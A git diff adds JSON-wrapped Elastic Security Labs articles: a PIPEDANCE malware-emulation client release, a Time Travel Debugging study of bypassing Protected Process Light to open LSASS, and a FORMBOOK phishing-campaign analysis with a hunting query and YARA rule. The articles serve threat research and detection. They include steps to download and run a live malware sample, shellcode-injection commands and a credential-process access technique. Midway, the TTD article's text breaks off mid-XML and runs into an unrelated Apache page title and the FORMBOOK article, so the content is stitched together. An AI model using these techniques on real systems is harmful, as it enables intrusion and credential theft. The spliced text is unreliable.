+ {
+ "slug": "eric-forte"
+ }
+ ],
+ "image": "Security Labs Images 18.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-dac_beta_release-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dancing_the_night_away_with_named_pipes-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dancing_the_night_away_with_named_pipes-md.json
new file mode 100644
index 00000000000..3ea4e61af4c
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dancing_the_night_away_with_named_pipes-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Dancing the night away with named pipes - PIPEDANCE client release\"\nslug: \"dancing-the-night-away-with-named-pipes\"\ndate: \"2023-10-05\"\ndescription: \"In this publication, we will walk through this client application’s functionality and how to get started with the tool.\"\nauthor:\n - slug: daniel-stepanic\nimage: \"photo-edited-12@2x.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - pipedance\n - ref1326\n---\n\n## Introduction\n\nThis year at [VB2023](https://www.virusbulletin.com/conference/), a globally renowned malware conference, Daniel Stepanic of the Elastic Security Labs team presented new insights into PIPEDANCE – a malware we [disclosed](https://twitter.com/elasticseclabs/status/1630289166008287232) earlier this year. In addition to the talk, we released a [client](https://github.com/elastic/PIPEDANCE) application that enables threat research, offering learning opportunities for both offensive and defensive teams. In this publication, we will walk through this client application’s functionality and how to get started with the tool. Our goal with this research is to help defenders improve their understanding of PIPEDANCE by emulating techniques from this malware, used by a formidable threat group. This includes different behaviors such as:\n\n - Command and control communication through named pipes\n - Different styles of process injection \n - Performing network connectivity checks\n - System/network discovery and enumeration\n\n## Recap\n\nPIPEDANCE is a custom malware family used by a state-sponsored group to perform post-compromise activities. It's purpose-built to enable lateral movement, deploy additional implants, and perform reconnaissance functions. PIPEDANCE uses named pipes as its main channel for command and control communication. With a variety of unique features, we believe it’s a useful example to share for research purposes and can help defenders validate security tooling.\n\nFor a detailed analysis of the PIPEDANCE malware, check out our [previous research](https://www.elastic.co/security-labs/twice-around-the-dance-floor-with-pipedance).\n\n## Development\n\nTo get a better understanding of different features within malware, our team at Elastic Security Labs sometimes writes custom applications and controllers to interact with the malware or malware infrastructure. This process helps cultivate knowledge of a sample’s core features, assists in understanding the control flow better, and further validates different areas such as inputs and outputs to functions and data structures. Another key benefit is to uncover functionality that was not directly observed during an intrusion but is still contained in the malware. This allows our team to collect more intelligence, build additional detections, and understand more of the adversary’s objectives behind the malware. \n\nWhile we don't cover these exact scenarios in this publication, here are some things that you can do with the client (but you may think of others):\n\n - Understand how malware abuses named pipes\n - Verify data sources for security tooling around network activity using named pipes\n - Build a network decoder using PCAP data from PIPEDANCE’s communication requests\n\nWith the release of the client, we're hoping that the community can write additional PIPEDANCE clients in your favorite language and compare notes.\n\n\n\n\n## Getting Started\n\n_**Note:** Please review the [requirements](https://github.com/elastic/PIPEDANCE/blob/main/README.md#requirements) before setting up the lab environment. For this example, we will use two different endpoints in the same local network where named pipes, inter-process communication, and SMB settings are configured properly._\n\nThe first step is to download the PIPEDANCE [sample](https://malshare.com/sample.php?action=detail&hash=e5ae20ac5bc2f02a136c3cc3c0b457476d39f809f28a1c578cda994a83213887) (free [registration](https://malshare.com/register.php) required) and start the program without any arguments on one endpoint. This machine is the targeted endpoint where the adversary is interested in running additional implants and performing reconnaissance. After execution, a named pipe will be created and await an incoming connection from our client. \n\n```\n.\\e5ae20ac5bc2f02a136c3cc3c0b457476d39f809f28a1c578cda994a83213887\n```\n\nNow that PIPEDANCE is running on our targeted machine, download and compile the client files within the [repository](https://github.com/elastic/PIPEDANCE). The PIPEDANCE malware uses a hard-coded string, `u0hxc1q44vhhbj5oo4ohjieo8uh7ufxe`, that serves as the named pipe name and RC4 key.\n\n\n\n\nTake the newly compiled client program and execute it on a separate endpoint with one argument using either the target IP address or hostname of the machine running PIPEDANCE (machine from the previous step). An example of this would be: \n\n```\npipedance_client.exe 192.168.47.130\n```\n\nAfter execution, the client will check in with the PIPEDANCE victim to retrieve the PID of the malicious process, working directory, and user running the process. A menu of commands should be listed allowing the operator to perform various post-compromise activities.\n\n\n\n\nThe appendix below contains the functions and their supported arguments.\n\n## Conclusion\n\nAs part of our research investigating PIPEDANCE, we are releasing a client application that interacts with the malware. This tool can be used to evaluate existing security prevention/detection technologies as well as used for threat research purposes. Please check out our [repository](https://github.com/elastic/PIPEDANCE), there is also a detection section with behavioral/YARA/hunting rules.\n\n## Appendix\n\n### Handler Commands\n\n| Command ID | Description | Arguments |\n|---|---|---|\n| 0 | Stop | PIPEDANCE client |\n| 1 | Terminate process by PID | PID (ex. 9867) |\n| 2 | Run shell command and print output | Command (ex. ipconfig) | \n| 4 | List files in current working directory |\n| 6 | Write file to disk | Filename (full path), file content |\n| 7 | Get current working directory |\n| 8 | Change current working directory | Folder path |\n| 9 | List running processes |\n| 23 | Create random process with hijacked token from provided PID and inject shellcode (32bits) | PID (token hijack), shellcode |\n| 24 | Create random process with hijacked token from provided PID and inject shellcode (64bits) | PID (token hijack), shellcode |\n| 25 | Open process from provided PID and inject shellcode (32bits) | PID (thread hijack), shellcode |\n| 26 | Open process from provided PID and inject shellcode (64bits) | PID (thread hijack), shellcode |\n| 71 | HTTP connectivity check | Domain (ex. google.com) \n| 72 | DNS connectivity check with provided DNS server IP | DNS server IP\n| 73 | ICMP connectivity check | ICMP server IP |\n| 74 | TCP connectivity check | IP, port |\n| 75 | DNS connectivity check without DNS server |\n| 99 | Disconnect pipe / exit thread |\n| 100 | Terminate PIPEDANCE process / disconnect Pipe / exit thread |\n"
+ },
+ "title": "Dancing the night away with named pipes - PIPEDANCE client release",
+ "slug": "dancing-the-night-away-with-named-pipes",
+ "date": "2023-10-05",
+ "description": "In this publication, we will walk through this client application’s functionality and how to get started with the tool.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "photo-edited-12@2x.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "pipedance",
+ "ref1326"
+ ]
+ },
+ "id": "security_labs_content-dancing_the_night_away_with_named_pipes-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-deep_dive_into_the_ttd_ecosystem-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-deep_dive_into_the_ttd_ecosystem-md.json
new file mode 100644
index 00000000000..026e6094788
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-deep_dive_into_the_ttd_ecosystem-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Deep dive into the TTD ecosystem\"\nslug: \"deep-dive-into-the-ttd-ecosystem\"\ndate: \"2022-11-30\"\ndescription: \"This is the first in a series focused on the Time Travel Debugging (TTD) technology developed by Microsoft that was explored in detail during a recent independent research period.\"\nauthor:\n - slug: christophe-alladoum\nimage: \"photo-edited-02-w.jpg\"\ncategory:\n - slug: security-research\ntags:\n - windows\n---\n\nSeveral times a year, Elastic Security Labs researchers get the freedom to choose and dig into projects of their liking — either alone or as a team. This time is internally referred to as “On-Week” projects. This is the first in a series focused on the [Time Travel Debugging](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-overview) (TTD) technology developed by Microsoft that was explored in detail during a recent On-Week session.\n\nDespite being made public for several years, awareness of TTD and its potential are greatly underrated within the infosec community. We hope this two-part series can help shed some light on how TTD can be useful for program debugging, vulnerability research and exploitation, and malware analysis.\n\nThis research involved first understanding the inner workings of TTD and then assessing some interesting applicable uses that can be made out of it. This post will focus on how researchers dive deep into TTD, sharing their methodology along with some interesting findings. The second part will detail the applicable use of TTD for the purpose of malware analysis and integration with Elastic Security.\n\n# Background\n\n[Time Travel Debugging](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-overview) is a tool developed by Microsoft Research that allows users to record execution and navigate freely into the user-mode runtime of a binary. TTD itself relies on two technologies: Nirvana for the binary translation, and iDNA for the trace reading/writing process. Available since Windows 7, TTD internals were first detailed [in a publicly available paper](https://www.usenix.org/legacy/events/vee06/full_papers/p154-bhansali.pdf). Since then, both [Microsoft](https://www.youtube.com/watch?v=l1YJTg_A914&) and [independent researchers](https://infocondb.org/con/recon/recon-2015/hooking-nirvana-stealthy-instrumentation-techniques-for-windows-10) have covered it in great detail. For this reason, we won’t explore the internals of both technologies in depth. Instead, Elastic researchers investigated the ecosystem — or the executables, DLLs, and drivers — that make the TTD implementation work. This led to some interesting findings about TTD, but also Windows itself, as TTD leverages some (undocumented) techniques to work as intended in special cases, such as [Protected Processes](https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-#system-protected-process).\n\nBut why investigate TTD at all? Aside from pure curiosity, it is likely that one of the possible intended uses for the technology would be discovering bugs in production environments. When bugs are hard to trigger or reproduce, having a “record-once-replay-always” type of environment helps compensate for that difficulty, which is exactly what TTD implements when coupled with WinDbg.\n\nDebugging tools such as [WinDbg](https://apps.microsoft.com/store/detail/9PGJGD53TN86) have always been an immense source of information when reversing Windows components, as they provide additional comprehensible information, usually in plain text. Debugging tools (especially debuggers) must cooperate with the underlying operating system, which could involve debugging interfaces and/or previously undisclosed capabilities from the OS. TTD conforms to that pattern.\n\n# High-level overview\n\nTTD works by first creating a recording that tracks every instruction executed by an application and stores it in a database (suffixed with .run). Recorded traces can be replayed at will using the WinDbg debugger, which on first access will index the .run file, allowing for faster navigation through the database. To be able to track execution of arbitrary processes, TTD injects a DLL responsible for recording activity on-demand which allows it to record processes by spawning them, but also may attach to an already-running process.\n\nTTD is freely [downloadable](https://apps.microsoft.com/store/detail/9PGJGD53TN86) as part of the WinDbg Preview package in the MS Store. It can be used directly from WinDbg Preview (aka WinDbgX), but is a standalone component that is located in `C:\\Program Files\\WindowsApps\\Microsoft.WinDbg____8wekyb3d8bbwe\\amd64\\ttd` for the x64 architecture, which we will focus on in this post. x86 and arm64 versions are also available for download in the MS Store.\n\nThe package consists of two EXE files (TTD.exe and TTDInject.exe) and a handful of DLLs. This research focuses on the major DLL responsible for everything not related to Nirvana/iDNA (i.e. responsible for the session management, driver communication, DLL injection, and more): ttdrecord.dll\n\n\\_Note: Most of this research was made using two versions of the ttdrecord DLL: mostly on a 2018 version (1.9.106.0 SHA256=aca1786a1f9c96bbe1ea9cef0810c4d164abbf2c80c9ecaf0a1ab91600da6630), and early 2022 version (10.0.19041.1 SHA256=1FF7F54A4C865E4FBD63057D5127A73DA30248C1FF28B99FF1A43238071CBB5C). The older versions were found to have more symbols, which helped speed up the reverse engineering process. We then re-adapted structures and function names to the most recent version. Therefore, some of the structures explained here might not be the same if you’re trying to reproduce on more recent versions. \\_\n\n# Examining TTD features\n\n## Command line parameters\n\nReaders should note that TTD.exe acts essentially as a wrapper to ttdrecord!ExecuteTTTracerCommandLine:\n\n```\nHRESULT wmain()\n{\nv28 = 0xFFFFFFFFFFFFFFFEui64;\nhRes = CoInitializeEx(0i64, 0);\nif ( hRes >= 0 )\n{\nModuleHandleW = GetModuleHandleW(L\"TTDRecord.dll\");\n[...]\nTTD::DiagnosticsSink::DiagnosticsSink(DiagnosticsSink, &v22);\nCommandLineW = GetCommandLineW();\nlpDiagnosticsSink = Microsoft::WRL::Details::Make(&v31, DiagnosticsSink);\nhRes = ExecuteTTTracerCommandLine(*lpDiagnosticsSink, CommandLineW, 2i64);\n[...]\n```\n\nThe final line of the code excerpt above shows a call to ExecuteTTTracerCommandLine , which takes an integer as the last argument. This argument corresponds to the desired tracing modes, which are: - 0 -\\> FullTracingMode, - 1 -\\> UnrestrictedTracing and - 2 -\\> Standalone (the hardcoded mode for the public version of TTD.exe)\n\nForcing TTD to run in full-tracing mode reveals available options, which include some hidden capabilities such as process reparenting (-parent) and automatic tracing until reboot (-onLaunch) for programs and services.\n\n[Dumping the complete option set](https://gist.github.com/calladoum-elastic/4666dafc789a273c35a4aedf2ed9cd9e) of TTDRecord.dll revealed interesting hidden command line options such as:\n\n```\n-persistent Trace programs or services each time they are started (forever). You must specify a full path to the output location with -out.\n-delete Stop future tracing of a program previously specified with -onLaunch or -persistent. Does not stop current tracing. For -plm apps you can only specify the package (-delete ) and all apps within that package will be removed from future tracing\n-initialize Manually initialize your system for tracing. You can trace without administrator privileges after the system is initialized.\n```\n\nThe process of setting up Nirvana requires TTD to set up the InstrumentationCallback field in the target \\_EPROCESS. This is achieved through the (undocumented but [known](https://www.codeproject.com/Articles/543542/Windows-x64-System-Service-Hooks-and-Advanced-Debu)) NtSetInformationProcess(ProcessInstrumentationCallback) syscall (ProcessInstrumentationCallback, which has a value of 40). Due to the potential security implication, invoking this syscall requires elevated privileges. Interestingly, the -initialize flag also hinted that TTD could be deployed as a Windows service. Such service would be responsible for proxying tracing requests to arbitrary processes. This can be confirmed by executing it and seeing the resulting error message:\n\n\n\nEven though it [is easy](https://www.virustotal.com/gui/search/TTDService.exe/files)to find evidence confirming the existence of TTDService.exe , the file was not provided as part of the public package, so aside from noting that TTD can run as a service, we will not cover it in this post.\n\n## TTD process injection\n\nAs explained, a TTD trace file can either be created from the standalone binary TTD.exe or through a service TTDService.exe (private), both of which must be run in a privileged context. However, those are just launchers and injecting the recording DLL (named TTDRecordCPU.dll) is the job of another process: TTDInject.exe.\n\nTTDInject.exe is another executable noticeably larger than TTD.exe, but with a pretty simple objective: prepare the tracing session. In an overly simplified view, TTD.exe will first start the process to be recorded in a suspended state. It will then spawn TTDInject.exe, passing it all the necessary arguments to prepare the session. Note that TTDInject can also spawn the process directly depending on the tracing mode we mentioned earlier — therefore, we are describing the most common behavior (i.e. when spawned from TTD.exe).\n\n\n\nTTDInject will create a thread to execute TTDLoader!InjectThread in the recorded process, which after various validations will in turn load the library responsible for recording all process activity, TTDRecordCPU.dll.\n\n\n\nFrom that point onward, all instructions, memory accesses, exceptions triggered, or CPU states encountered during the execution will be recorded.\n\nOnce the general workflow of TTD was understood, it became clear that little to no manipulation is possible after the session initialization. Thus, further attention was paid to the arguments supported by ttdrecord.dll. Thanks to the C++ mangling function format, a lot of critical information can be retrieved from the function names themselves, which makes analyzing the command line argument parser relatively simple. One interesting flag that was discovered was PplDebuggingToken. That flag is hidden and only available in Unrestricted Mode.\n\n\n\nThe existence of this flag immediately raised questions: TTD was architected first around Windows 7 and 8, and on Windows 8.1+. The concept of Protection Level was added to processes, dictating that processes can only open handles to a process with a [Protection Level](https://www.elastic.co/blog/protecting-windows-protected-processes#Protected%20process%20light:%7E:text=a%20kernel%20driver.-,Protected%20process%20light,-) that is equal or inferior. It is a simple byte in the \\_EPROCESS structure in the kernel, and thus not directly modifiable from user mode.\n\n\n\nThe values of the Protection Level byte are well known and are summarized in the table below.\n\n\n\nThe Local Security Authority subsystem (lsass.exe) on Windows [can be configured](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) to run as Protected Process Light, which aims to limit the reach of an intruder who gains maximum privileges on a host. By acting at the kernel level, no user-mode process can open a handle to lsass, no matter how privileged.\n\n\n\nBut the PplDebuggingToken flag appears to suggest otherwise. If such a flag existed, it would be the dream of any pentester/red teamer: a (magic) token that would allow them to inject into protected processes and record them, dump their memory or more. The command line parser seems to imply that the content of the command flag is a mere wide-string. Could this be a PPL backdoor?\n\n### Chasing after the PPL debugging token\n\nReturning to ttdrecord.dll, the PplDebuggingToken command line option is parsed and stored in a context structure along with all of the options required to create the TTD session. The value can be traced down to several locations, with an interesting one being within TTD::InitializeForAttach, whose behavior is simplified in the following pseudo-code:\n\n```\nErrorCode TTD::InitializeForAttach(TtdSession *ctx)\n{\n [...]\n EnableDebugPrivilege(GetCurrentProcess()); // [1]\n HANDLE hProcess = OpenProcess(0x101040u, 0, ctx->dwProcessId);\n if(hProcess == INVALID_HANDLE_VALUE)\n {\n goto Exit;\n }\n [...]\n HMODULE ModuleHandleW = GetModuleHandleW(L\"crypt32.dll\");\n if ( ModuleHandleW )\n pfnCryptStringToBinaryW = GetProcAddress(ModuleHandleW, \"CryptStringToBinaryW\"); // [2]\n\n if ( ctx->ProcessDebugInformationLength ) // [3]\n {\nDecodedProcessInformationLength = ctx->ProcessDebugInformationLength;\nDecodedProcessInformation = std::vector(DecodedProcessInformationLength);\nwchar_t* b64PplDebuggingTokenArg = ctx->CmdLine_PplDebugToken;\nif ( *pfnCryptStringToBinaryW )\n{\n if( ERROR_SUCCESS == pfnCryptStringToBinaryW( // [4]\n b64PplDebuggingTokenArg,\n DecodedProcessInformationLength,\n CRYPT_STRING_BASE64,\n DecodedProcessInformation.get(),\n &DecodedProcessInformationLength,\n 0, 0))\n {\n Status = NtSetInformationProcess( // [5]\n NtGetCurrentProcess(),\n ProcessDebugAuthInformation,\n DecodedProcessInformation.get(),\n DecodedProcessInformationLength);\n }\n[...]\n```\n\nAfter enabling the SeDebugPrivilege flag for the current process ([1]) and obtaining a handle to the process to attach to ([2]), the function resolves an exported generic function used to perform string operations: crypt32!CryptStringToBinaryW. In this instance, it is used for decoding the base64-encoded value of the PplDebuggingToken context option if it was provided by the command line( [3], [4]). The decoded value is then used to invoke the syscall NtSetInformationProcess(ProcessDebugAuthInformation) ([5]). The token doesn’t seem to be used anywhere else, which made us scrutinize that syscall.\n\nThe process information class ProcessDebugAuthInformation was added in [RS4](https://en.wikipedia.org/wiki/Windows_10_version_1803). A quick look at ntoskrnl shows that this syscall simply passes the buffer to CiSetInformationProcess located in ci.dll, which is the Code Integrity driver DLL. The buffer is then passed to ci!CiSetDebugAuthInformation with fully controlled arguments.\n\n\n\nThe following diagram summarizes at a high level where this happens in the execution flow of TTD.\n\n\n\nThe execution flow in CiSetDebugAuthInformation is simple enough: the buffer with the base64-decoded PplDebuggingToken and its length are passed as arguments for parsing and validation to ci!SbValidateAndParseDebugAuthToken. Should the validation succeed, and after some extra validation, a handle to the process performing the syscall (remember that we’re still handling the syscall nt!NtSetInformationProcess) will be inserted in a process debug information object then stored in a global list entry.\n\n\n\nBut how is that interesting? Because this list is only accessed in a single location: in ci!CiCheckProcessDebugAccessPolicy, and this function is reached during a NtOpenProcess syscall. And, as the name of the newly discovered flag suggested earlier, any process whose PID is located in that list would bypass the Protection Level enforcement. This was confirmed practically in a [KD](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugging-using-kd-and-ntkd) session by setting an access breakpoint on that list (on our version of ci.dll this was located at ci+364d8). We also [enabled PPL on LSASS](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) and wrote a simple PowerShell script that would trigger a NtOpenProcess syscall:\n\n\n\nBy breaking at the call to nt!PsTestProtectedProcessIncompatibility in nt!PspProcessOpen, we can confirm that our PowerShell process attempts to target lsass.exe, which is a PPL process:\n\n\n\nNow to confirm the initial theory of what the PplDebuggingToken argument would do by forcing the return value of the call to nt!PsTestProtectedProcessIncompatibility:\n\n\n\nWe break at the instruction following the call to nt!PsTestProtectedProcessIncompatibility (which only calls CI!CiCheckProcessDebugAccessPolicy), and force the return value to 0 (as mentioned earlier a value of 1 means incompatible):\n\n\n\nSuccess! We obtained a handle to LSASS despite it being PPL, confirming our theory. Summarizing, if we can find a “valid value” (we’ll dig into that soon) it will pass the check of SbValidateAndParseDebugAuthToken() in ci!CiSetDebugAuthInformation(), and we would have a universal PPL bypass. If this sounds too good to be true, that’s mostly because it is — but confirming it requires developing a better understanding of what CI.dll is doing.\n\n### Understanding Code Integrity policies\n\nRestrictions based on code integrity, such as those used by AppLocker, can be enforced through policies, which in their human readable form are XML files. There are two types of policies: base and supplemental. Examples of what base policies look like can be found in their XML format in \"C:\\Windows\\schemas\\CodeIntegrity\\ExamplePolicies\\\". This is what a Base Policy looks like in its XML form (taken from \"C:\\Windows\\schemas\\CodeIntegrity\\ExamplePolicies\\AllowAll.xml\"), which reveals most of the details we’re interested in clearly in plaintext.\n\n```\n\n\n1.0.1.0\n{A244370E-44C9-4C06-B551-F6016E563076}\n{A244370E-44C9-4C06-B551-F6016E563076}\n{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}\n\n\n\n\n\n\n\nGetting Started - Apache HTTP Server Version 2.5\n...truncated…\n\n```\n\nDeobfuscating the JavaScript using the same debugger as before, we can see several ActiveXObjects. This time, however, there are far fewer and the execution is more prescripted, eliminating useless calls. This shows a refinement from before. This newer code also uses a .wsf extension instead of the previous .cpl. This allows the exploit to use the Windows Scripting Host to execute code. This is the same directory traversal technique we observed in the Testing phase. However, this time the JavaScript is looking for the Profile.rar file (whereas in the Testing phase, it was looking for IECache.inf) and attempting to execute the PowerShell script, which was prepended in Profile.rar as a Windows Script File (.wsf).\n\n\n\n#### Dropper\n\nAs we illustrated above, Profile.rar has a prepended Base64 encoded PowerShell command which downloads abb01.exe. The JavaScript from Profile.html attempts to execute this PowerShell code within Profile.rar as a Windows Script File.\n\nabb01.exe is a dropper that when dynamically executed, drops another PE file, yxojzzvhi0.exe in our example.\n\n#### FORMBOOK Binary\n\nyxojzzvhi0.exe was scanned with Elastic YARA rules and identified to be a variant of [FORMBOOK](https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook), based on unique byte sequences.\n\nFORMBOOK, also known as XLOADER, is an information stealer that includes keyloggers, clipboard copiers, and form grabber components to collect and exfiltrate sensitive information. This malware has been [offered as-a-service](https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I) for over five years and remains a successful tool for stealing information.\n\n### Generic phase\n\nOn October 28 and November 8, 2021, we observed additional sightings but used a generic phishing attachment tactic to load FORMBOOK. Additionally, we were able to collect some information from the email header that we’ll discuss in the Campaign Analysis section.\n\n\n\nThese sightings all have two RAR attachments. One of the attachments has a .rar file extension and the other has either a .gz or .7z extension. We’ll explore one of the sightings below.\n\n```\n$ file D2110-095.gz DWG.rar\nD2110-095.gz: RAR archive data, v5\nDWG.rar: RAR archive data, v5\n```\n\nThe RAR files contained two PE files. They were identical instances of a very [common FORMBOOK variant](https://www.virustotal.com/gui/file/4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096/detection).\n\n```\n$ omnihash DWG.exe D2110-095.exe\nHashing file DWG.exe\n MD5: ff882802d113ed02fa070c496f89d797\n SHA1: aad1eed1c53f1d33ab52e13442b036bfeee91f1b\n SHA256: 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096\nHashing file D2110-095.exe\n MD5: ff882802d113ed02fa070c496f89d797\n SHA1: aad1eed1c53f1d33ab52e13442b036bfeee91f1b\n SHA256: 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096\n```\n\n## Campaign analysis\n\nWhile researching this FORMBOOK campaign, we observed infrastructure reuse and tooling similarities during testing and operational phases, which we believe represent a single campaign.\n\n\n\n### Email header\n\nThroughout all sightings, the campaign used similar sending email addresses:\n\n- admin0011[@]issratech.com\n- admin010[@]backsjoy.com\n- admin012[@]leoeni.com\n\nAdditionally, across the Production and Generic phases of the campaign, we observed the X-Mailer element (the software identifier set by the sending email client) as RainLoop/1.16.0. RainLoop is an open-source email client. It should be noted that in our collection, one sighting had some header information sanitized before being uploaded to VirusTotal. RainLoop could have been referenced in this sighting, but we were not able to confirm that.\n\n### File hashes\n\nAcross the Production phase, we were able to identify code sharing through the use of the same attachment (Profile.rar).\n\n### IP addresses\n\nAcross the Testing and Production phases, we observed that 104[.]244[.]78[.]177 was used for all elements of the campaigns. This IP address was used to host archives, implants, and scripts.\n\n### Resource development\n\nAs research progressed, we observed activities we believed were capability testing. This activity was observed one time and used artifacts ([IEcache.inf](https://github.com/aslitsecurity/CVE-2021-40444_builders/blob/main/CVE-2021-40444/IEcache.inf), [document.xml.rels](https://raw.githubusercontent.com/aslitsecurity/CVE-2021-40444_builders/main/CVE-2021-40444/source/doc/word/_rels/document.xml.rels)) from a public CVE-2021-40444 exploit proof-of-concept [repository](https://github.com/aslitsecurity/CVE-2021-40444_builders). Other phases included custom exploit code that differed from the PoC code but shared [initial access](https://attack.mitre.org/techniques/T1566/001) and [execution](https://attack.mitre.org/techniques/T1203) TTPs as well as the same network infrastructure.\n\nWe observed that the issratech[.]com, backsjoy[.]com, and leoeni[.]com domains own TLS certificates provided by Let’s Encrypt. While the steps of creating a TLS certificate are not overly cumbersome, the fact that the domain owner went through the preparatory process of creating a certificate could indicate that these domains are intended to be used for future encrypted operations.\n\nIn the Generic phase, the campaign abandoned the MSHTML exploit and attempted to leverage a traditional phishing malware-attachment approach. This shift in tactics is possibly because successful exploit patching rendered the vulnerability ineffective.\n\n### Victimology\n\nWe observed that of the four companies targeted by this campaign, all were in the manufacturing vertical. Threat actors utilizing FORMBOOK have been observed targeting the manufacturing vertical [in the past](https://threatpost.com/formbook-malware-targets-us-defense-contractors-aerospace-and-manufacturing-sectors/128334/). The companies all had international footprints in:\n\n- Industrial Materials, Aluminum extrusion, HQ in Germany (Testing phase)\n- Industrial Conglomerate, Industrial Chemicals, HQ in South Korea (Production phase)\n- Industrial Manufacturing Products and Consulting, HQ in Switzerland (Generic phase)\n- Industrial Mechanical Engineering and Manufacturing, HQ in Germany (Generic phase)\n\nWhile the targeted companies are of note (in that they are in the same vertical), an email address domain observed in all three phases — issratech[.]com, appears similar to a legitimate Jamaican company domain, isratech[.]com (notice the difference between one and two s's), a business that specializes in irrigation, wastewater management, and solar energy. Below, is a screenshot of issratech[.]com using the default CyberPanel landing page. CyberPanel is a web hosting tool for WordPress sites.\n\n\n\nEach targeted company of the admin0011[@]issratech.com email address have expertise or products that could have been valuable to an Isratch project listed on their projects page (`https://www.isratech[.]com/projects/`):\n\n- Chemical: Waste-water treatment, dairy production sanitation\n- Extruded aluminum: Solar array scaffolding, greenhouses\n\nTwo additional email address domains were observed in the Generic phase — one appears to be mimicking a legitimate medical equipment manufacturer (backjoy[.]com) and the other (leonei[.]com) appears to be adversary controlled, but seemingly not being used for legitimate purposes.\n\n> leonei[.]com is protected by a Denial-of-Service protection service, so their domain IP address likely represents multiple legitimate domains and any blocking of the leonei[.]com IP address from the indicator table should be carefully measured.\n\nIt is possible, but not confirmed, that the recipients of the phishing emails in all phases are from a list of email addresses in the manufacturing vertical. These email lists are commonly available for purchase to enable sales, marketing, and business-to-business (B2B) efforts but can also be used for phishing campaigns.\n\n## Tactics\n\nUsing the MITRE ATT&CK® framework, tactics represent the why of a technique or sub technique. It is the adversary’s tactical goal: the reason for performing an action.\n\nObserved tactics:\n\n- Resource development\n- Initial access\n- Execution\n\n## Techniques / Sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\nObserved techniques/sub techniques\n\n- Acquire infrastructure - server\n- Obtain capabilities - malware and exploits\n- Stage capabilities - upload malware\n- Phishing - attachment\n- Command and scripting interpreter - PowerShell\n- Exploitation for client execution\n\n## Detections\n\n### Hunting queries\n\nThese queries can be used in Kibana’s Security → Timelines → New Timeline → Correlation query editor. While these queries will identify this intrusion set, they can also identify other events of note that, once investigated, could lead to other malicious activities.\n\nThis query will identify the CVE-2021-40444 exploit attempt from a malicious Access, Publisher, PowerPoint, or Word document.\n\n```\nprocess where event.type in (\"start\", \"process_started\") and process.parent.name : (\"eqnedt32.exe\", \"excel.exe\", \"fltldr.exe\", \"msaccess.exe\", \"mspub.exe\", \"powerpnt.exe\", \"winword.exe\") and process.command_line :\n (\"*../../..*\",\n \"*..\\\\..\\\\*\",\n \"*cpl:..*\",\n \"*hta:..*\",\n \"*js:..*\",\n \"*jse:..*\",\n \"*sct:..*\",\n \"*vbs:..*\",\n \"*wsf:..*\")\n```\n\n\n\n### YARA rule\n\nWe have created a YARA rule to identify this FORMBOOK activity.\n\n```\nrule Windows_Trojan_FORMBOOK {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2021-06-14\"\n last_modified = \"2021-08-23\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"FORMBOOK\"\n threat_name = \"Windows.Trojan.FORMBOOK\"\n reference_sample = \"6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a\"\n strings:\n $a1 = { 3C 30 50 4F 53 54 74 09 40 }\n $a2 = { 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 }\n $a3 = { 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 }\n $a4 = { 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 }\n condition:\n any of them\n}\n```\n\n## Defensive Recommendations\n\nThe following steps can be leveraged to improve a network’s protective posture:\n\n1. Review and implement the above detection logic within your environment using technology such as Sysmon and the Elastic Endpoint or Winlogbeat\n2. Review and ensure that you have deployed the latest Microsoft Security Updates\n3. Maintain backups of your critical systems to aid in quick recovery\n\n## References\n\nThe following research was referenced throughout the document:\n\n- [https://nvd.nist.gov/vuln/detail/CVE-2021-40444](https://nvd.nist.gov/vuln/detail/CVE-2021-40444)\n- [https://twitter.com/vxunderground/status/1436326057179860992?s=20](https://twitter.com/vxunderground/status/1436326057179860992?s=20)\n- [https://github.com/lockedbyte/CVE-2021-40444](https://github.com/lockedbyte/CVE-2021-40444)\n- [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444)\n- [https://github.com/aslitsecurity/CVE-2021-40444_builders](https://github.com/aslitsecurity/CVE-2021-40444_builders)\n- 